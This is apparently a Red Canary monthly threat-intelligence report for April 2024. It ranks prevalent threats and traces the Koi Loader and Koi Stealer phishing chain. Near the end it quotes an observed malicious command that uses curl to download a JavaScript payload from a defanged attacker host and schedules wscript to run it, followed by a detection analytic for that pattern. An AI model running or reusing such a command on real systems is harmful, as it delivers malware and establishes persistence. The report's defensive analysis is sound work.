Each month, the Intel team provides Red Canary customers with an analysis of trending, emerging, or otherwise important threats that we’ve encountered in confirmed threat detections, intelligence reporting, and elsewhere over the preceding month. We call this report our “Intelligence Insights” and share a public version of it with the broader infosec community.
Highlights
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for April 2024:
| Last month's rank | Threat name | Threat description |
|---|---|---|
| Last month's rank: ⬆ 1* | Threat name: | Threat description : Collection of Python classes to construct/manipulate network protocols |
| Last month's rank: ⬆ 1* | Threat name: | Threat description : Open source tool that dumps credentials using various techniques |
| Last month's rank: ⬆ 3 | Threat name: | Threat description : Activity cluster that uses a distribution scheme similar to SocGholish and uses JScript files to drop NetSupport Manager onto victim systems |
| Last month's rank: ⬆ 4* | Threat name: | Threat description : Suspected pay-per-install (PPI) provider that uses malvertising to deliver installers, often disguised as cracked games, fonts, or desktop wallpaper |
| Last month's rank: ⬆ 4* | Threat name: | Threat description : Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives |
| Last month's rank: ⬆ 4* | Threat name: NetSupport Manager | Threat description : Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access |
| Last month's rank: ⬇ 4* | Threat name: | Threat description : Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code |
| Last month's rank: ⬇ 8* | Threat name: | Threat description : JScript dropper/downloader that typically poses as a document containing an "agreement,” often distributed through search engine redirects |
| Last month's rank: ⬆ 8* | Threat name: Koi | Threat description : Activity cluster that includes Koi Loader and a final payload of Koi Stealer, a .NET stealer |
| Last month's rank: ⬆ 10* | Threat name: | Threat description : Penetration testing tool that integrates functionality from multiple offensive security projects and has the ability to extend its functionality with a native scripting language |
| Last month's rank: ⬆ 10* | Threat name: Fakebat | Threat description : A malware-as-a-service loader delivered via malvertising lures masquerading as legitimate popular software to download and install one or more payloads such as a stealer or banking trojan |
| Last month's rank: ⬆ 10* | Threat name: FIN7 | Threat description : Financially motivated threat group whose activity has been observed prior to the deployment of ransomware |
| Last month's rank: ➡ 10* | Threat name: | Threat description : Malware family capable of a range of behaviors, including DLL side-loading, capturing the screen, and keylogging |
| Last month's rank: ⬇ 10* | Threat name: | Threat description : Activity cluster using a worm spread by external drives that leverages Windows Installer to download malicious files |
⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Observations on trending threats
Impacket and Mimikatz tied for the top spot this month on our top 10 most prevalent threats list, likely due to unconfirmed legitimate customer use and customer testing. Danabot dropped completely off the list after ranking 4th last month. Four different threats tied for 4th this month, including last year’s top threat, Charcoal Stork. Upon investigation, we determined that the Charcoal Stork activity we saw in April was due to backups writing old binaries, and not due to new Charcoal Stork activity.
NetSupport Manager was part of the tie for 4th, which is the highest it has ranked in our top 10 since it first appeared on the list in February 2023. This higher ranking is because NetSupport Manager was dropped as a follow-on payload by two other threats in our top 10 in April: Scarlet Goldfinch and FIN7.
Speaking of FIN7, it was part of a five-way tie for 10th, along with Fakebat. Both FIN7 and Fakebat leverage MSIX installers, a trend we’ve been tracking since last year. For more technical details on these installer packages, read our new blog with clips from our recent MSIX webinar.
Koi goes phishing
Koi, sharing the 8th spot with Gootloader, is our newcomer to the top 10 list this month. Koi is an activity cluster that includes both Koi Loader and Koi Stealer, which we currently track together. Koi has previously been mistaken as Azorult, however we and other researchers now assess these to be different threats.
Koi is typically delivered via a ZIP file attached to a phishing email, often with the current month and a bank-theme in the name, for example Chasebank_Statement_May.zip, as seen on May 22. The ZIP included a LNK shortcut file that we saw executing Client-Url (curl) and downloading the next stage of Koi Loader, a BAT script. The .bat script included PowerShell that pulled down a JavaScript payload. The .js payload subsequently downloaded and executed additional PowerShell scripts. Those PowerShell scripts executed C++ code and downloaded a final PowerShell script; this is the last stage of Koi Loader, based on our observations.
The final Koi Loader PowerShell script decodes and runs a .NET stealer, Koi Stealer. Koi Stealer, like all info stealers, is designed to steal sensitive information—such as system data, browser history, and user cookies—and send that information back to adversaries via C2 connections established by the malware.
As previously mentioned, one of Koi Loader’s early stages uses curl, and the curl command leverages schtasks to execute a downloaded script, for example:
"C:\Windows\System32\cmd.exe" /c curl -s -v -o RdnDLNWtQ4Vh.js "hxxps://prayas[.]co/assets/apostatizingyT.php" & schtasks /create /f /sc minute /mo 1 /tr "wscript 'C:\Users\USERNAME\AppData\Local\Temp\RdnDLNWtQ4Vh.js' bDc29RvqedpHoWL" /tn bDc29RvqedpHoWLUsing schtasks to execute a script gives us a detection opportunity.
Detection opportunity: Executing Windows Script Host (wscript.exe or cscript.exe) from a scheduled task
This pseudo detection analytic identifies execution of the Windows Script Host (wscript.exe or cscript.exe) from a scheduled task. This can be used by adversaries to establish a persistence mechanism or for delayed malware execution, behavior seen by malware like Koi. System administrators will often use scheduled tasks to automate legitimate system administration tasks, and malicious use can mirror administrative actions. When investigating this behavior, try to confirm the purpose of the script and check to ensure no malicious binaries are created or suspicious network connections are made.
process == (schtasks)
&&
command_line_includes == (create)
&&
command_line_includes == (wscript, cscript)
&&
command_line_does_not_include == (*)
Note: * is a placeholder for strings associated with legitimate use of schtasks in your environment
The 2024 Threat Detection Report is here!
Related Articles
Open with Notepad: Protecting users from malicious JavaScript